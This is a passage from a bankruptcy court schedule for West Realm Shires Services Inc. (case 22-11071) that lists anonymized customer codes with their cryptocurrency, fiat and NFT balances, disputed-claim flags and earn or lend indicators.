| 07311269 | | LTC[0], MATIC[0], UNI[0], USDT[0.00000004] | | |
| 07311271 | | USD[100.00] | | |
| 07311273 | | BTC[0.00082643], USD[18.02], USDT[.4042312] | | |
| 07311279 | | BCH[0.00397400], DOGE[0.45050000], ETH[0], ETHW[0], GRT[.0492], LINK[0], SOL[.02472], SUSHI[.00000001], USD[0.00], USDT[0 | | |
| 07311281 | | GRT[.484], SOL[.0013], SUSHI[.497], USD[3741.84] | | |
| 07311285 | | SOL[.3482], SUSHI[.2475], USD[0.00] | | |
| 07311289 | | SOL[.00000001], USD[0.00], USDT[0.00000001] | | |
| 07311293 | | ETH[0], USD[0.00], USDT[0.00000007] | | |
| 07311294 | | BTC[0], SOL[0], USD[0.00] | | |
| 07311301 | | SOL[7726.62345], USD[86702.16] | | |
| 07311309 | | SUSHI[18.426], USD[2.33] | | |

West Realm Shires Services Inc.

22-11071 (JTD)

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07311323 | Contingent, Disputed | BTC[.77996872], USD[472.75] | | |
| 07311331 | | BTC[0], NFT (316698890738765473/FTX - Off The Grid Miami #1469)[1], NFT (336348150613135075/GSW Western Conference Finals Commemorative Banner #2180)[1], NFT (366520898496711886/GSW Round 1 Commemorative Ticket #644)[1], NFT (389401895830321707/GSW Western Conference Finals Commemorative Banner #2179)[1], NFT (427667206418574042/Warriors Logo Pin #721 (Redeemed))[1], NFT (455606313254436977/Warriors Gold Blooded NFT #976)[1], NFT (493169177735505072/GSW Championship Commemorative Ring)[1], NFT (518651518413408898/GSW Western Conference Semifinals Commemorative Ticket #593)[1], SOL[.092], SUSHI[.056], USD[1.35], USDT[0.00021179] | | |
| 07311335 | | ETH[1.930383], ETHW[1.930383], SOL[52.8471], USD[1.36] | | |
| 07311338 | | BTC[0], ETH[.00000001], NFT (290612780171074943/7289)[1], NFT (310232923815073776/7305)[1], NFT (359101669770398259/7302)[1], NFT (365474784054457497/6648)[1], NFT (374082548210021169/7309)[1], NFT (391840239006426995/7315)[1], NFT (404196629997968655/7299)[1], NFT (425560426977183512/6667)[1], NFT (439589738258755795/7292)[1], NFT (443475668639915232/6660)[1], NFT (459630173417756649/6655)[1], NFT (460562877287294604/6631)[1], NFT (472689888210512656/6645)[1], NFT (490407472038951554/6633)[1], NFT (492529863737917851/6621)[1], NFT (501475210831414123/6624)[1], NFT (506595719407461414/6657)[1], NFT (513091122514186863/6672)[1], NFT (525587407944586147/7301)[1], NFT (525648288543173810/7296)[1], NFT (526883692117195825/7318)[1], NFT (557891511504539256/6663)[1], NFT (558681520366051667/7307)[1], NFT (575579274913808881/7312)[1], SUSHI[.00000001], UNI[.00000001], USD[1.43], USDT[0] | | |
| 07311340 | | BTC[0], DOGE[.565], ETH[.000024], ETHW[.000024], SUSHI[.338], USD[1.50] | | |
| 07311350 | | BTC[0], USD[0.01] | | |
| 07311352 | | AAVE[2.21778], BTC[.5714679], ETH[.252747], ETHW[.252747], LINK[121.0788], SOL[93.81609], UNI[26.3736], USD[680.50] | | |
| 07311362 | | USD[2.10] | | |
| 07311363 | | ETH[.280872], ETHW[.280872], SOL[186.2418], USD[112.63] | | |
| 07311370 | | ETH[0], SOL[0], USD[0.00] | | |
| 07311381 | | USD[83.95] | | |
| 07311382 | | NFT (385920918050112534/Cold & Sunny #312)[1], USD[0.54] | | |
| 07311398 | | BTC[0.00000090], DOGE[.512], LTC[.00102], SOL[0], SUSHI[10.967], TRX[.299], UNI[.0084], USD[2.40] | | |
| 07311400 | | USD[2000.00] | | |
| 07311401 | | ETHW[34.90000000], SOL[.00002], USD[0.00] | | |
| 07311403 | | NFT (547522631759690068/Imola Ticket Stub #693)[1], USD[499.51] | | |
| 07311405 | | USD[0.90] | | |
| 07311408 | | BTC[0], SOL[0], USD[0.00] | | |
| 07311409 | | BTC[0], DOGE[50007.99203020], ETH[0], SOL[0], USD[0.00], USDT[0.00023372] | | |
| 07311410 | | BTC[0], MATIC[8.488], USD[0.00] | | |
| 07311415 | | USD[2.39] | | |
| 07311416 | | BTC[0], DOGE[0], ETH[0], SOL[50.41182661], USD[0.00] | | |
| 07311417 | | USD[14.41] | | |
| 07311419 | | USD[10.00] | | |
| 07311422 | | BTC[0.01193936], USD[2.48] | | |
| 07311423 | | BTC[0.00004170], ETH[0.00075290], ETHW[0.00075290], SOL[0], USD[6.81] | | |
| 07311424 | | AAVE[.0089], DOGE[.912], GRT[.493], NFT (314184097163852064/Markham Street  #01)[1], SOL[0], SUSHI[.17826494], USD[0.00] | | |
| 07311425 | | SUSHI[.4], TRX[.012], USD[0.00], USDT[.8701075] | | |
| 07311435 | | AVAX[51.5484], BTC[0], ETHW[9.61610187], MATIC[.98], USD[12919.37] | | |
| 07311438 | | SOL[0] | | |
| 07311439 | | BTC[0], NFT (295411239370663218/The 2974 Collection #0391)[1], NFT (541280897511930637/2974 Floyd Norman - CLE 4-0267)[1], NFT (574181698279581805/Birthday Cake #0391)[1] | | |
| 07311440 | | BTC[0.00005960], LTC[.00396], SOL[0.00123791], SUSHI[.07482746], USD[0.57], USDT[0.00000005] | | |
| 07311441 | | BTC[.00004888], USD[3397.49] | | |
| 07311447 | | BTC[0], DOGE[.891], TRX[.612], USD[0.00], USDT[22.53049371] | | |
| 07311451 | | BTC[0], DOGE[0], ETH[0.00047621], ETHW[0.00047620], SOL[0], USD[0.60], USDT[0] | | |
| 07311454 | | DAI[0], ETH[0], LTC[0], USD[0.00], USDT[0] | | |
| 07311457 | | DOGE[.97547678], ETH[0], LINK[.0791], MATIC[38.15], USD[0.00], USDT[.0091907] | | |
| 07311458 | | BTC[.03892747], ETH[.99914], ETHW[.99914], SOL[2], USD[79.21] | | |
| 07311459 | | ETH[.00000001], ETHW[0], USD[1.16], USDT[0] | | |
| 07311460 | | USD[0.01] | | |
| 07311463 | | AVAX[0], DOGE[0], ETH[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07311465 | | BTC[.000001], SOL[25.28633492], USD[0.01], USDT[0.00000001] | Yes | |
| 07311466 | | DOGE[.93291975], USD[4.60] | | |
| 07311473 | | BTC[.00007415], GRT[105.53504780], LINK[0], NFT (330013353098250206/PixelPuffins #1905)[1], NFT (336676666401790368/Naked Meerkat #4766)[1], NFT (344646290203365602/#1673)[1], NFT (413596321977851128/Gloom Punk #5087)[1], NFT (458734620225581882/Sloth #8194)[1], NFT (465308939461628793/Sloth #7473)[1], NFT (518016752760001964/Kiddo #207)[1], NFT (573610086727979297/Sloth #6876)[1], SOL[0.09669953], SUSHI[10.27983996], UNI[6.75220209], USD[3.06], USDT[0] | | |
| 07311474 | | BTC[0] | | |
| 07311477 | | BTC[0], DOGE[.857], ETH[0.00084773], ETHW[0.00084772], GRT[.807], SOL[.04], SUSHI[.48], UNI[.0396], USD[3.36] | | |
| 07311482 | | BTC[0], USD[0.00], USDT[0] | | |
| 07311483 | | NFT (425944078684764262/ape mfer #8497)[1] | | |
| 07311485 | | USD[7.63] | | |
| 07311488 | | SOL[229.516], USDT[66.864] | | |
| 07311494 | | BTC[.0000947], DOGE[80.807], SOL[.0039571], SUSHI[.00000001], USD[0.00], USDT[0] | | |
| 07311495 | | ETH[.094], ETHW[.094] | | |
| 07311497 | | USD[100.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07311502 | | BTC[.0055944], USD[88.64] | | |
| 07311505 | | BTC[0], USD[0.00] | | |
| 07311506 | | BTC[.0000361], DOGE[.012], SOL[.002508], USD[7083.46], USDT[0] | | |
| 07311507 | | KSHIB[9.99], USD[0.40] | | |
| 07311513 | | USD[0.00] | | |
| 07311514 | | BTC[0.10229760], LINK[.0283], USD[20.75] | | |
| 07311517 | | BTC[0], DOGE[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07311519 | | AAVE[.008784], BTC[0], ETH[.00024005], ETHW[.00024005], SOL[.00958], USD[2.12] | | |
| 07311521 | | USD[0.11] | | |
| 07311523 | | BTC[0.15883140], ETH[5.42127314], ETHW[5.42127314], USD[0.00] | | |
| 07311528 | | BTC[0], DOGE[0], ETH[0], LTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07311536 | | BTC[0], ETH[0], ETHW[0], LTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07311551 | | NFT (340223342013269424/Coachella x FTX Weekend 1 #1390)[1] | | |
| 07311557 | Contingent, Disputed | ETH[0.00000001], SOL[0], USD[0.00], USDT[0] | | |
| 07311566 | | USD[0.00] | | |
| 07311568 | | BTC[0], UNI[0], USD[0.00], USDT[0] | | |
| 07311576 | | USD[0.00], USDT[.26911506] | | |
| 07311578 | | USD[500.45] | | |
| 07311583 | | BTC[0], USD[0.01] | | |
| 07311586 | | SHIB[1], USD[0.00] | | |
| 07311591 | | GRT[0], LINK[0], SOL[0.00000001], UNI[0] | | |
| 07311594 | | DOGE[0], SUSHI[.002], TRX[.182], USD[8.79], USDT[1.44323917] | | |
| 07311597 | Contingent, Disputed | SUSHI[.0736], USD[0.01] | | |
| 07311599 | | USD[75.00] | | |
| 07311600 | | USD[1.00] | | |
| 07311601 | | BTC[0], DOGE[190.54], ETH[.00000001], LTC[0], NFT (494216495300080320/Saber The Kentucky Cat)[1], SHIB[0], SOL[224.18747638], TRX[0], USD[0.00] | | |
| 07311604 | | BTC[0], DOGE[0.28406443], LINK[0], USD[0.01], USDT[0] | | |
| 07311606 | | SUSHI[336.687], USD[0.06] | | |
| 07311612 | | BAT[1500.18], DOGE[3000.613], ETH[.000633], ETHW[.000633], GRT[3000.59], LINK[100], LTC[.002], MATIC[1000], SHIB[13694700], SOL[60.47349], SUSHI[250.0595], TRX[10854.104], UNI[100.0509], USD[4166.52] | | |
| 07311620 | | NFT (440407403536849458/Metaverse Santa #1684)[1], USD[0.00], USDT[0] | | |
| 07311621 | | ETHW[.13604916], USD[0.00], USDT[0.00003685] | | |
| 07311623 | | ETHW[0], SOL[0], USD[0.00] | | |
| 07311626 | | SUSHI[.332], USD[508.12] | | |
| 07311627 | | BTC[0], USD[13.33] | | |
| 07311642 | | BTC[0], ETH[0], SOL[0], USD[2.31], USDT[0.00000001] | | |
| 07311643 | | BTC[.051992], DOGE[94.905], ETH[2.25], ETHW[2.25], SOL[47.95], SUSHI[3.996], USD[0.47] | | |
| 07311654 | | USDT[0.00000004] | | |
| 07311655 | | BTC[0.00001647], USDT[.00427535] | | |
| 07311662 | | BTC[0], ETH[0], GRT[0], LINK[0], LTC[0], NFT (374711980802585654/#1)[1], NFT (401014400581046052/HeyBear #3)[1], NFT (410059019525691828/#135)[1], NFT (412792343910844880/Mint Pass Goblin Chest)[1], NFT (441719284141079567/#363)[1], NFT (534013478104308872/Px #77)[1], NFT (536496365188199393/#84)[1], NFT (563579006656675300/#97)[1], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07311663 | | MATIC[28], SHIB[1719245.0802048], USD[34.02] | | |
| 07311667 | | ETH[.00000001], ETHW[0], USD[0.01], USDT[0] | | |
| 07311673 | | BTC[0], DOGE[4.98], ETH[.00020191], ETHW[0.00020191], USD[1.67] | | |
| 07311679 | | BTC[0], ETH[0], SOL[0.25000000], UNI[.00000001], USD[0.00] | | |
| 07311686 | | USD[100.00] | | |
| 07311689 | | BTC[0.00000981], USD[0.00] | | |
| 07311691 | | NFT (449985173535150821/FTX - Off The Grid Miami #4453)[1] | | |
| 07311692 | | BTC[.00013355], USD[2.32] | Yes | |
| 07311693 | | USD[10.00] | | |
| 07311694 | | USD[10.00] | | |
| 07311695 | | BCH[0.04480538] | | |
| 07311698 | | BTC[0], ETH[0], ETHW[0], LINK[0], SOL[0], USD[10.37] | | |
| 07311700 | | AAVE[.1019102], BTC[0], DOGE[0], ETH[.01645828], ETHW[0.01645827], GRT[449.13058059], MATIC[28.13705975], SHIB[8901575.16621699], SOL[20.91495763], USD[0.00], USDT[0.00000001] | | |
| 07311701 | | BTC[0], DOGE[0.13982725], USD[0.00] | | |
| 07311706 | | BTC[.00162274], DOGE[.388], ETH[0.11273386], ETHW[0.11273386], GRT[0], SHIB[8467], USD[0.00], USDT[0.00000001] | | |
| 07311712 | | SUSHI[.25] | | |
| 07311715 | | BTC[.00002247], ETH[.00017439], ETHW[.00017439], GRT[.928], LINK[.0556], LTC[.00288], TRX[.148], USD[0.19] | | |
| 07311730 | | SOL[.088], USD[1.24], USDT[.339252] | | |

West Realm Shires Services Inc.

Redacted ED Schedule 1.752 priority Uscl Cus custmer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07311735 | | SOL[.00516], USD[19.97] | | |
| 07311736 | | USD[0.00] | | |
| 07311742 | | USD[10.00] | | |
| 07311753 | | BTC[0] | | |
| 07311756 | | USD[0.03] | | |
| 07311761 | | BTC[0], DOGE[0], ETH[.00000001], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07311766 | | SOL[0] | | |
| 07311767 | | NFT (454875687442721893/Coachella x FTX Weekend 1 #8038)[1] | | |
| 07311771 | | ETH[0], USD[0.00] | | |
| 07311780 | | USD[247.45] | | |
| 07311783 | | USD[10.00] | | |
| 07311784 | | USD[10.00] | | |
| 07311785 | | DOGE[.784], ETH[0], GRT[6], SOL[.004], USD[0.00] | | |
| 07311790 | | BTC[0] | | |
| 07311793 | | BTC[0], USD[0.00] | | |
| 07311795 | | BTC[0], SOL[0], USD[0.00] | | |
| 07311805 | | TRX[0], USDT[0] | | |
| 07311819 | | NFT (392654849430156534/Entrance Voucher #3154)[1] | | |
| 07311822 | | TRX[.000001], USD[0.00], USDT[0] | | |
| 07311825 | | BTC[0.00009990], DOGE[0], ETH[.00701201], ETHW[.007012], TRX[455.628], USD[0.05] | | |
| 07311826 | | ETH[.15689821], ETHW[.15689821] | | |
| 07311836 | | USD[3.65] | | |
| 07311839 | | ETHW[1.40262332], USD[0.46] | | |
| 07311844 | | BTC[0], USD[0.00], USDT[0] | | |
| 07311850 | | ETH[0], SOL[0], USD[3.28] | | |
| 07311851 | | BTC[.0000706], NFT (292113527433771143/Microphone #8699)[1], NFT (38788458619604853/SBF Hair & Signature #2 #131)[1], NFT (500472983751758217/FTX - Off The Grid Miami #199)[1], SOL[.0074], SUSHI[.072707731], USD[757.27] | | |
| 07311853 | | USD[10.00] | | |
| 07311854 | | USD[10.00] | | |
| 07311858 | | AAVE[.00211], BTC[.000083], DOGE[.653], ETH[.00037807], ETHW[.00037807], LINK[0], LTC[.008536], MATIC[0.99547578], SOL[0.00000001], SUSHI[.33723089], USD[1.30] | | |
| 07311860 | | MATIC[18], USD[184.43] | | |
| 07311864 | | BTC[0], SOL[.33526466] | | |
| 07311866 | | BTC[0], ETH[.00000001], USD[1.10] | | |
| 07311873 | | AVAX[0], BTC[0], DAI[0], DOGE[0.64088780], ETH[0.00013601], ETHW[0.00024963], LINK[0], NFT (295128721871576624/NEO-NINJA MINT TICKET)[1], NFT (309285280309399817/Sollama)[1], NFT (316890137900518879/Royal Key)[1], NFT (319941267490075550/NEO-NINJA MINT TICKET)[1], NFT (326208920346927290/NEO-NINJA MINT TICKET)[1], NFT (329250635304995524/MagicEden Vaults)[1], NFT (336196787254609636/NEO-NINJA MINT TICKET)[1], NFT (338057232128830273/NEO-NINJA MINT TICKET)[1], NFT (340209642499787170/NEO-NINJA MINT TICKET)[1], NFT (345418348494536938/NEO-NINJA MINT TICKET)[1], NFT (347670734541336985/NEO-NINJA MINT TICKET)[1], NFT (348585498817141108/NEO-NINJA MINT TICKET)[1], NFT (350069536898153091/NEO-NINJA MINT TICKET)[1], NFT (351904015515177048/NEO-NINJA MINT TICKET)[1], NFT (351827032882445984/NEO-NINJA MINT TICKET)[1], NFT (355067491726074890/MagicEden Vaults)[1], NFT (364078325259463941/NEO-NINJA MINT TICKET)[1], NFT (366973745992266406/NEO-NINJA MINT TICKET)[1], NFT (368317948340960191/NEO-NINJA MINT TICKET)[1], NFT (369569017873851086/NEO-NINJA MINT TICKET)[1], NFT (372732277134817199/NEO-NINJA MINT TICKET)[1], NFT (374644655599922632/NEO-NINJA MINT TICKET)[1], NFT (380900970934168885/NEO-NINJA MINT TICKET)[1], NFT (390233668898442567/NEO-NINJA MINT TICKET)[1], NFT (390389695808938514/NEO-NINJA MINT TICKET)[1], NFT (393929948037915881/NEO-NINJA MINT TICKET)[1], NFT (398132826078135507/NEO-NINJA MINT TICKET)[1], NFT (399101789419013712/NEO-NINJA MINT TICKET)[1], NFT (411110506604840880/NEO-NINJA MINT TICKET)[1], NFT (419918461920324143/NEO-NINJA MINT TICKET)[1], NFT (423533413978278516/NEO-NINJA MINT TICKET)[1], NFT (424855476423944235/NEO-NINJA MINT TICKET)[1], NFT (431705644141022809/NEO-NINJA MINT TICKET)[1], NFT (434345888873672577/NEO-NINJA MINT TICKET)[1], NFT (434643609554538526/NEO-NINJA MINT TICKET)[1], NFT (440017571870024885/NEO-NINJA MINT TICKET)[1], NFT (440276856475479670/NEO-NINJA MINT TICKET)[1], NFT (443361047746316470/NEO-NINJA MINT TICKET)[1], NFT (449888844553088687/NEO-NINJA MINT TICKET)[1], NFT (455944208558591524/NEO-NINJA MINT TICKET)[1], NFT (458171904686341959/Humpty Dumpty #1296)[1], NFT (463464910226208583/NEO-NINJA MINT TICKET)[1], NFT (463820502355588671/NEO-NINJA MINT TICKET)[1], NFT (465180688561424420/NEO-NINJA MINT TICKET)[1], NFT (468074281320347840/NEO-NINJA MINT TICKET)[1], NFT (470782047846169686/MagicEden Vaults)[1], NFT (476799917650617672/NEO-NINJA MINT TICKET)[1], NFT (480082883182330945/NEO-NINJA MINT TICKET)[1], NFT (482784860539292037/MagicEden Vaults)[1], NFT (484203220646970165/NEO-NINJA MINT TICKET)[1], NFT (488576501915431609/NEO-NINJA MINT TICKET)[1], NFT (491183022975298007/NEO-NINJA MINT TICKET)[1], NFT (491591871947089090/MagicEden Vaults)[1], NFT (492746710741397190/NEO-NINJA MINT TICKET)[1], NFT (505869637652096676/NEO-NINJA MINT TICKET)[1], NFT (506702374668085465/NEO-NINJA MINT TICKET)[1], NFT (508135614474213227/MagicEden Vaults)[1], NFT (508637023454770377/NEO-NINJA MINT TICKET)[1], NFT (509743716995770490/NEO-NINJA MINT TICKET)[1], NFT (514701025369157300/NEO-NINJA MINT TICKET)[1], NFT (514709814929500042/NEO-NINJA MINT TICKET)[1], NFT (521077515423546005/NEO-NINJA MINT TICKET)[1], NFT (525076578505884583/NEO-NINJA MINT TICKET)[1], NFT (527340770083702375/NEO-NINJA MINT TICKET)[1], NFT (529658656824920433/Junkmail#310)[1], NFT (532806241128527451/NEO-NINJA MINT TICKET)[1], NFT (541083816662374869/NEO-NINJA MINT TICKET)[1], NFT (541349889242442473/NEO-NINJA MINT TICKET)[1], NFT (544866801990258529/NEO-NINJA MINT TICKET)[1], NFT (545418919830693491/NEO-NINJA MINT TICKET)[1], NFT (545303482929157138/NEO-NINJA MINT TICKET)[1], NFT (548630708317157893/NEO-NINJA MINT TICKET)[1], NFT (553175193758580992/NEO-NINJA MINT TICKET)[1], NFT (555094173596367885/NEO-NINJA MINT TICKET)[1], NFT (557245319984976455/NEO-NINJA MINT TICKET)[1], NFT (557738361914950333/NEO-NINJA MINT TICKET)[1], NFT (562045937956955866/NEO-NINJA MINT TICKET)[1], NFT (564252609579880861/NEO-NINJA MINT TICKET)[1], NFT (565303845379619104/NEO-NINJA MINT TICKET)[1], SOL[0.00995861], SUSHI[0], USD[0.31], USDT[0.37105400] | | |
| 07311874 | | BTC[0], SOL[59.87836115], USD[0.15] | | |
| 07311878 | | BTC[.20519], DOGE[.356], ETH[10.202647], ETHW[10.202647], SOL[6498.825], USD[53.14] | | |
| 07311882 | | ETHW[0.64783231], NFT (529197067779112673/Australia Ticket Stub #859)[1], NFT (552212982523585375/FTX - Off The Grid Miami #4224)[1], SOL[0], USD[0.00], USDT[0] | | |
| 07311902 | | BTC[0.00041065], MATIC[.32371133], SOL[0.00251588], USD[224.12], USDT[0], WBTC[0] | | |
| 07311903 | | ETH[.00044], ETHW[.00044], USD[1.06] | | |
| 07311904 | | SHIB[1100257 8.9274898] | | |
| 07311905 | | USDT[0.00004369] | | |
| 07311906 | | ETHW[3.608637], GRT[13999.5], SOL[53.449], USD[956.30], YFI[.000999] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07311908 | | USD[2.53] | | |
| 07311910 | | BTC[0] | | |
| 07311912 | | USD[0.00] | | |
| 07311914 | | BTC[.00009421], SOL[.00552406], USD[0.06] | | |
| 07311915 | | AAVE[0.00151498], BTC[0.01639375], DAI[0], DOGE[0], ETH[0.00093401], ETHW[0.00093401], LINK[0], LTC[0], MATIC[0], MKR[0.00039004], SOL[0.00238012], SUSHI[441.96159094], TRX[0], USD[901.09], USDT[0.90165126], WBTC[0.00009954], YFI[0] | | |
| 07311918 | | TRX[1], USD[0.00] | | |
| 07311920 | | BTC[0], DOGE[270.21000000], ETH[0], SOL[0], TRX[0], USD[1.24], USDT[0.00000004] | | |
| 07311922 | | NFT[2910800150876146638/Entrance Voucher #2959][1], NFT[568240758738707224/Romeo #785][1], USD[0.01] | | |
| 07311926 | | SOL[.14] | | |
| 07311929 | | USD[0.00], USDT[0.00001080] | | |
| 07311935 | | USD[10.00] | | |
| 07311937 | | SOL[.0695572], TRX[.000004], USD[0.00], USDT[1.75] | | |
| 07311942 | | USD[1.07] | | |
| 07311947 | | AVAX[.05966027], ETH[0.00952749], ETHW[0.00036901], USD[0.87], WBTC[0] | Yes | |
| 07311952 | | BTC[.00009008], DOGE[.17545], ETH[.0002976], ETHW[.0002976], LTC[.0081], SOL[.00934], SUSHI[.367], USD[3468.89], USDT[1998.90463809] | | |
| 07311955 | | DOGE[.802], ETH[.00060917], ETHW[.00060917], USD[1.37], USDT[1.46586202] | | |
| 07311969 | | BTC[0], SOL[0], USD[0.01] | | |
| 07311970 | | USD[0.00] | | |
| 07311971 | | SOL[0], USD[.09], USDT[0.00000001] | | |
| 07311972 | | BTC[0], CUSDT[0.14786156], DOGE[.64866], ETH[0.42280624], ETHW[0.41607990], LINK[0], LTC[0], MATIC[7.14754557], SOL[0.00497871], USD[20.43], USDT[0], WBTC[0.00008364] | | ETH[.408637] |
| 07311978 | | MATIC[0], NFT[307756353174997933/Reflection '19 #67][1], NFT[310332040796310734/Japan Ticket Stub #131][1], NFT[314087079027599099/Fortune Cookies #417][1], NFT[314863030223682932/Silverstone Ticket Stub #425][1], NFT[316903200603048498/Exclusive 2974 Collection Merchandise Package #2812 (Redeemed)][1], NFT[336337108677113414/France Ticket Stub #281][1], NFT[339990101475048892/Monaco Ticket Stub #127][1], NFT[340153710222887855/Barcelona Ticket Stub #299][1], NFT[346183630987681635/Golden Hill #399][1], NFT[350251110694878357/Australia Ticket Stub #468][1], NFT[369222007014602784/Miami HEAT: 15 Strong - 3/50][1], NFT[392058262630951923/Netherlands Ticket Stub #74][1], NFT[397861691569360263/Montreal Ticket Stub #270][1], NFT[409580564853728379/Austin Ticket Stub #150][1], NFT[411108029099169983/Austria Ticket Stub #266][1], NFT[423874766602701129/Miami Ticket Stub #615][1], NFT[438012488817842521/Imola Ticket Stub #1421][1], NFT[438921995835130072/Bahrain Ticket Stub #29][1], NFT[459262964460759520/Singapore Ticket Stub #103][1], NFT[466115575863175537/Hungary Ticket Stub #44][1], NFT[474680279712516403/The 2974 Collection #1792][1], NFT[481102583170720595/Mexico Ticket Stub #2025][1], NFT[494248428514500176/Fancy Frenchies #5377][1], NFT[499642833847102724/Monza Ticket Stub #35][1], NFT[518295138593383862/Birthday Cake #1792][1], NFT[539904164083261020/Belgium Ticket Stub #292][1], NFT[549163548856864399/2974 Floyd Norman - CLE 2-0064][1], NFT[567342290465642343/Baku Ticket Stub #281][1], NFT[569483927016712489/Saudi Arabia Ticket Stub #2095][1], USD[0.00] | | |
| 07311987 | Contingent, Disputed | USD[0.00] | | |
| 07311991 | | SUSHI[.00000001] | | |
| 07311995 | | CUSDT[52954.761], GRT[14.985], PAXG[.82917], SUSHI[334.665], USD[1000.55] | | |
| 07311996 | | DAI[0], USD[0.11], USDT[0] | | |
| 07311997 | | USD[10.00] | | |
| 07312002 | | BTC[0.00005880], ETH[.00020855], ETHW[.00020855], SUSHI[26.4405] | | |
| 07312007 | | USD[10.00] | | |
| 07312012 | | SOL[.01] | | |
| 07312017 | | BTC[0], ETH[0], ETHW[4.05824311], LTC[.00295], SOL[0], USD[2.93], USDT[0.00983804] | | |
| 07312025 | | BAT[.00000001], BTC[0], CUSDT[1], MATIC[0], SHIB[1], TRX[0], USD[0.00] | Yes | |
| 07312031 | | BTC[.0000671], SUSHI[.0332], USD[0.00], USDT[0.00879085] | | |
| 07312032 | | BTC[0], NFT[324748575231770435/Entrance Voucher #2418][1], NFT[36700213171557604/Humpty Dumpty #872][1], USD[0.00], USDT[0] | | |
| 07312039 | | DOGE[.671], GRT[.937], SOL[.09898], USD[0.12], USDT[0] | | |
| 07312050 | | BAT[48.09745506], BCH[.01969991], BTC[.00081709], DAI[4.95157385], DOGE[1779.06168773], ETH[.11999115], ETHW[.11999115], GRT[24.79713944], LINK[.92909901], LTC[.07043904], SOL[5.43051064], SUSHI[3.35053435], TRX[348.57828859], UNI[1.05865604], USD[959.39], USDT[5.95051346], YFI[.00047183] | | |
| 07312053 | | BTC[.000075], SUSHI[.216], USD[7.89], USDT[0] | | |
| 07312060 | | BTC[.01132061], SOL[2.7388375], USD[0.46], USDT[0] | | |
| 07312062 | | BTC[0], SOL[0], USDT[.023589] | | |
| 07312067 | | BCH[0.0058675], BTC[0], CHF[0.00], DOGE[23.86051466], ETH[0], ETHW[0.00059806], KSHIB[3.51], LTC[0.04059095], SUSHI[0], TRX[31.25877778], USD[1051.09], USDT[0.00590584] | | |
| 07312068 | | USD[0.00] | | |
| 07312076 | | BTC[.36425912], ETH[4.2826638], ETHW[4.2826638], SOL[602.42715], SUSHI[204.80525], UNI[411.20898], USD[0.08], USDT[.44435566], YFI[.02897245] | | |
| 07312077 | | BTC[0], NFT[414347237334735263/Entrance Voucher #7266][1], USD[0.00] | | |
| 07312079 | | BTC[0], ETH[0], ETHW[1.04000000], USD[0.01] | | |
| 07312085 | | ETH[.00096], ETHW[.00096], USD[0.59], USDT[4.9986408] | | |
| 07312095 | | BTC[0], USD[0.00] | | |
| 07312098 | | AAVE[.00717], AVAX[.04324], BCH[.0006228], BTC[.00013568], DOGE[.712], ETH[.00058057], ETHW[0.00094107], GRT[.9936], LINK[.07501], MATIC[16.864], NEAR[.0422], SOL[0.01247685], SUSHI[.5991], UNI[.02015], USD[0.00], USDT[0.21273788], YFI[.0015084] | | |
| 07312102 | | LTC[0], USD[0.00], USDT[0] | | |
| 07312105 | | BAT[.00000001], BF_POINT[300], ETH[0], ETHW[1.66742632], NEAR[3.7503378], NFT[437427133280143538/Humpty Dumpty #391][1], NFT[451756221719395526/FTX - Off The Grid Miami #5898][1], NFT[479007646556618229/The Hill by FTX #6883][1], NFT[499415613306740549/FTX - Off The Grid Miami #5900][1], NFT[511356333347947788/Entrance Voucher #2298][1], NFT[547478532916794366/Saudi Arabia Ticket Stub #526][1], NFT[566651935099535750/Imola Ticket Stub #927][1], SHIB[0], USD[0.00000001], TRX[0], USD[1896], USD[0.00] | Yes | |
| 07312108 | | BTC[0], DOGE[.8244], ETH[.00094004], ETHW[.00094004], LINK[.08976], LTC[.00279119], MATIC[10], SHIB[64400], SOL[0.00484800], TRX[.1896], USD[0.00] | | |
| 07312109 | | AAVE[0], AVAX[0], DAI[0], DOGE[0], ETH[0.00000001], ETHW[0], LINK[0], MATIC[0], MKR[0], PAXG[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00000001], YFI[0] | | |
| 07312110 | | SOL[0], SUSHI[.11831075], USD[24.32] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07312113 | | USD[2.06] | | |
| 07312124 | | USD[6.40] | | |
| 07312125 | | DOGE[10000], ETH[5], ETHW[5], SOL[109.89], USD[252.45] | | |
| 07312127 | | DOGE[0], SOL[0], USDT[0], YFI[0.00549390] | | |
| 07312128 | | USD[3.94] | | |
| 07312129 | | SOL[271.104], USD[6.96] | | |
| 07312132 | | BTC[.0000396], ETH[.000217], ETHW[.000217], SOL[.00413], USD[0.00] | | |
| 07312134 | | USD[0.00] | | |
| 07312136 | | BF_POINT[1000], USD[0.00], USDT[0] | | |
| 07312139 | | USD[10.00] | | |
| 07312141 | | BTC[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07312144 | | BTC[0], DOGE[0], SOL[0], USD[0.00] | | |
| 07312145 | | BTC[.0005325] | | |
| 07312146 | | BTC[.00053004], USD[0.00], USDT[0] | | |
| 07312147 | | USD[0.07] | | |
| 07312149 | | BTC[0], SOL[356.04598778], USD[0.38] | | |
| 07312150 | | NFT (368163197346427807/FTX - Off The Grid Miami #1792)[1], SOL[.009995], USD[0.00] | | |
| 07312154 | | BTC[0.00008295], DOGE[.541], LINK[.0648], SOL[.00377904], TRX[.288], USD[949.29], USDT[0], YFI[.000794] | | |
